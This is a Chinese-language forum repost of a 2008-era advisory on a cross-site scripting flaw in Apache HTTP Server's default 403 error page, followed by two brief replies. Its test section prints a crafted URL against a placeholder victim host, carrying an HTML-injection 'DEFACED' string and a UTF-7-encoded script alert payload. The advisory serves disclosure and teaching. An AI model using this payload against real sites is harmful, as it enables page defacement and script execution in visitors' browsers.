打印

Apache HTTP服务器403 Error页面跨站脚本漏洞

本帖已经被作者加入个人空间

Apache HTTP服务器403 Error页面跨站脚本漏洞

受影响系统
Apache Group Apache 2.2.x
Apache Group Apache 1.3.x

描述:

Apache HTTP Server是一款流行的Web服务

如果Apache服务器使用Forbidden 403默认页面的话,则用户在该服务器上请求特制的URL触发403 Error错误后就可能导致在用户浏览器会话中执行跨站脚本。


测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
复制内容到剪贴板
代码:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--
建议:
--------------------------------------------------------------------------------
厂商补丁:

Apache Group
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apache.org
生活就是每天挤公交车..
在混浊空气之中和在走走停停之间幻想着世界的美好....

TOP

潜力贴 留

潜力贴 留名
流淚才能譲人成長, -受伤才能譲人坚强。

TOP


感谢一直以来您对我们的支持!
当前时区 GMT+8, 现在时间是 2008-11-22 18:26 京ICP证060528 号

Designed By 17DST